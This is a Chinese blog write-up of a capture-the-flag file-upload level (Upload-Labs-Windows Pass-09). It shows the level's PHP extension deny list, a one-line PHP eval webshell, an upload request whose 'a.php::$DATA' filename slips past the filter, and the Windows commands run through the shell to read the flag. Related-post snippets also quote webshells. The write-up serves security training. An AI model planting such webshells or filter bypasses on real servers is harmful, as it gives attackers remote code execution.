【CTF Web】BUUCTF [Windows]Upload-Labs-Windows Pass-09 Writeup(文件上传+PHP+::$DATA绕过)

于 2024-09-06 11:34:48 发布
阅读量1k 收藏 8
点赞数 22
分类专栏: CTF Writeup 文章标签: 前端 windows php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/138335428
版权

[Windows]Upload-Labs-Windows

1
Windows 下的 Uploads Labs

简介

upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。

注意

1.每一关没有固定的通关方法,大家不要自限思维!

2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路。

3.实在没有思路时,可以点击查看提示。

4.如果黑盒情况下,实在做不出,可以点击查看源码。

后续

如在渗透测试实战中遇到新的上传漏洞类型,会更新到upload-labs中。当然如果你也希望参加到这个工作当中,欢迎pull requests给我!

项目地址:https://github.com/c0ny1/upload-labs

任务

上传一个webshell到服务器。

提示

本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess后缀文件!

代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

解法

传个一句话木马。

<?php @eval($_POST['a']); ?>

提示:此文件类型不允许上传!

用 Burp 抓包,文件后缀加上 ::$DATA。

------WebKitFormBoundaryEm31kwE8K6VQJD8m
Content-Disposition: form-data; name="upload_file"; filename="a.php::$DATA"
Content-Type: application/octet-stream

<?php @eval($_POST['a']); ?>

------WebKitFormBoundaryEm31kwE8K6VQJD8m

放行,上传成功。

右键点击图片,复制图像链接。

http://731d9ad5-a282-4820-a572-0028f0fb9fff.node5.buuoj.cn:81/upload/202404300135056761.php::$data

把 ::$data 去掉,通过蚁剑连接:

http://731d9ad5-a282-4820-a572-0028f0fb9fff.node5.buuoj.cn:81/upload/202404300135056761.php

连接失败,报 500 错误。

用 hackbar 发送 POST 请求。

a=phpinfo();

回显正常。

网站根目录:

a=system("ls");

可能因为是 Windows系统,无法使用 Linux 命令。

查询系统信息。

a=echo `systeminfo`;

Microsoft Windows Server 2019 系统。

Host Name: OUT OS Name: Microsoft Windows Server 2019 Datacenter OS Version: 10.0.17763 N/A Build 17763 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: N/A Registered Organization: N/A Product ID: 00430-00000-00000-AA533 Original Install Date: 12/7/2021, 8:57:18 PM System Boot Time: 4/5/2024, 6:44:01 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2500 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: zh-cn;Chinese (China) Input Locale: en-us;English (United States) Time Zone: (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi Total Physical Memory: 32,767 MB Available Physical Memory: 27,725 MB Virtual Memory: Max Size: 37,631 MB Virtual Memory: Available: 33,085 MB Virtual Memory: In Use: 4,546 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): 4 Hotfix(s) Installed. [01]: KB5004335 [02]: KB5004424 [03]: KB5008218 [04]: KB5008287 Network Card(s): N/A Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

查看所有盘符。

a=echo `wmic logicaldisk get name`;

只有一个 C 盘。

Name C:

搜索 C 盘中所有文件名含 flag 的文件。

a=echo `dir /s /b C:\*flag*`;

没有结果。

从 C 盘根目录找起。

a=echo `dir C:\`;

找到文件 Fl@g_glzjin_still_w@nts_a_girl_friend.txt。

Volume in drive C has no label. Volume Serial Number is 8608-A41E Directory of C:\ 04/30/2024 10:34 AM 44 Fl@g_glzjin_still_w@nts_a_girl_friend.txt 12/28/2021 05:54 PM
inetpub 05/07/2020 12:48 PM 5,510 License.txt 12/28/2021 05:54 PM
php 12/07/2021 08:57 PM
Program Files 12/07/2021 12:55 PM
Program Files (x86) 12/28/2021 05:47 PM 172,328 ServiceMonitor.exe 12/07/2021 12:58 PM
Users 12/28/2021 05:46 PM
Windows 3 File(s) 177,882 bytes 6 Dir(s) 21,066,338,304 bytes free

输出文件内容。

a=echo `type C:\Fl@g_glzjin_still_w@nts_a_girl_friend.txt`;

取得 flag。

flag{7b563661-54a9-4aab-b8b9-e92ead783137}

Flag

flag{7b563661-54a9-4aab-b8b9-e92ead783137}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
专栏目录
[网络安全自学篇] 八十.WHUCTFWEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
文件上传
qingse1013的博客
01-24 2877
文件上传 原理 类型 预防 0x00 文件上传原理 文件上传漏洞是指用户上传了一个可执行脚本文件,并通过此文件获得了执行服务器端命令的能力。在大多数情况下,文件上传漏洞一般是指上传 WEB 脚本能够被服务器解析的问题,也就是所谓的 webshell 问题。完成这一攻击需要这样几个条件,一是上传的文件能够被 WEB 容器执行,其次用户能从 WEB 上访问这个文件,最后,如果上传的文件被安全检查、格式化、图片压缩等功能改变了内容,则可能导致攻击失败。 Webshell简介: WebShell就是以a
BUUCTF upload-labs
oJiuJieZhong的博客
10-11 3306
①这里是前端JS限制了我们只能上传特点格式的文件 ②这里我们可以在设置里面直接关闭网页的JS ③或者通过抓包的形式,绕过前端验证 ④这里在burp suite中将jpg改成php ⑤这里上传成功 ⑥我们也可以通过抓包的形式来了解文件上传的位置 ...
Upload-Labs-Windows Pass-01
Ethan552525的博客
11-17 2575
Pass-01 题目: 解题: 步骤1:上传文件 上传一句话木马,编辑文件a.php,内容为:<?php eval($_POST['shell']);?> 直接上传的话,会提示错误。题目要求选择图片格式上传,文件名改为a.jpg,内容为:<?php eval($_POST['shell']);?>,然后通过burp suite来修改上传文件名字。 步骤2:改文件名 把a.jpg改为a.php,然后点send,会发现上传成功: <img src="../.
搭建upload-labs(windows
m0_51295934的博客
01-17 2028
声明:本文大致内容是转载下面大佬的博客,本文是稍作一点点小修改,简略了一下文件上传漏洞靶场:upload-labs安装+第一关教程(一)_北风-CSDN博客_upload-lab 1.首先需要下载一个phpstudy集成环境,2016或者是官网最新版的都可以(我就亲测了这两个版本),其他版本的应该也行,下载好之后,点击启动按钮,如下图 显示Apache、MySQL运行即可 2.下载靶机系统文件(文件下载网址https://github.com/Tj1ngwe1/upload-labs),之后解压到
Upload-Labs-Windows Pass-02
Ethan552525的博客
11-19 3238
可采用Pass-01同样的解题方法。 查看源码: 根据源码可知,只要保证Content-Type:image/jpeg, image/png, image/gif 即可。 MIME类型 在浏览器中显示的内容有 HTML、有 XML、有 GIF、还有 Flash ……浏览器是根据MIME Type(资源的媒体类型)来区分。媒体类型通常是通过 HTTP 协议,由 Web 服务器告知浏览器的,更准确地说,是通过 Content-Type 来表示的。MIME Type 不是个人指定的,...
文件上传漏洞类型靶场——upload-labs靶场安装(Windows系统)
edsion4的博客
12-04 911
所有上传漏洞类型的靶场——upload-labs安装(Windows
upload-labs 全21关 write-up
ST0new的博客
03-06 4262
upload-labs 从经典靶场入手,看文件上传发展经历 下载 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 下载地址:https://github.com/c0ny1/upload-labs/releases 在 win 环境下 直接解压到phpstudy下即可 绕过方式 从以下练习中提炼出文件上传绕过方式 上传文件类型不收限制 前端Javascript
upload-labs通关详解以及相关知识点
qq_45584159的博客
12-20 5496
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言 前言
红队专题-Perm权限提升与维持隐匿Privilege Escalation
最新发布
aming小老弟
10-27 1009
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
Upload-Labs-Windows Pass-03
Ethan552525的博客
11-21 2509
此题暂时还未解出,做个记录。 解题过程: 上传文件a.php,内容为:<?php eval($_POST['shell']);?> 得到提示: 对文件类型进行了过滤,把文件名改为a.php3后,可以成功上传: 但文件名变为了一串数字。虽然我们上传成功了,但是 201111211141527218.php3却不能解析,要正常解析还需要满足以下条件任意一种: 条件一:Apache的 httpd.conf 中有如下配置代码: AddType a...
buu刷题笔记之文件上传漏洞全集-Upload-labs通关手册
qq_44217591的博客
03-02 1593
简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 第一关 根据直接上传php木马,发现前端报错: 【方法一】打开浏览器检查功能,关闭js加载,即可绕过限制 【方法二】通过Burp Suit 进行抓包改后缀名,绕过前端的JS检校。 打开burp 对后缀进行修...
upload-labs】windows特性绕过5~8
qq_43665434的博客
03-19 643
upload-labs】windows特性绕过5~8 【pass-05】大小写绕过 1、源码分析: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5"
BUUCTF做题Upload-Labs记录pass-01~pass-10
Goodric的博客
07-26 1115
前端验证后缀。 传1.png 抓包改1.php 即可。
使用windows10搭建upload-labs靶场
m0_67463450的博客
02-27 353
使用phpstudy搭建upload-labs环境(c0ny1/upload-labs)
BUUCTF--练习场-- basic--上传文件漏洞经典靶场upload-labs-- Pass1-3(Pass4简单尝试)
qq_51550750的博客
01-29 2953
文件上传功能非常常见,上传图片、视频,论坛发送带上附件,邮件发送带上附件等场景 BUUCTF–练习场-- basic–上传文件漏洞经典靶场upload-labs Pass-1 先尝试上传一张正常的照片: 上传成功: 右键,查看图像,得到上传成功的地址: http://07b2a810-8fe2-406b-b1d0-6bce30a755ae.node4.buuoj.cn:81/upload/Chrysanthemum.jpg 然后尝试上传木马: 根据简介中提到的: upload-labs是一
BUUCTF密码基础题——window系统密码
qq_62642080的博客
06-30 1429
buuctf,window系统密码
upload-labs安装及攻略
drnrrwfs的博客
07-31 2829
利用这一特点,我们可以进行双写后缀名操作,即加一个后缀名让他替换掉,如‘test.php’改写为’test.pphphp’当后缀名被替换掉后会变成空格,可以绕过黑名单的检测,但是存储时空格会被去掉,最后剩下的文件后缀名合并为’test.php’。(3)第三种方法是我们先将要上传的文件后缀名修改成页面允许上传的类型,这样在点击上传后就可以通过前端的验证,用burp工具进行抓包,在burp中将文件后缀名改回原本想要上传的格式,再进行上传,这样就可以上传我们想要的类型文件而不会被前端的验证拦截。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值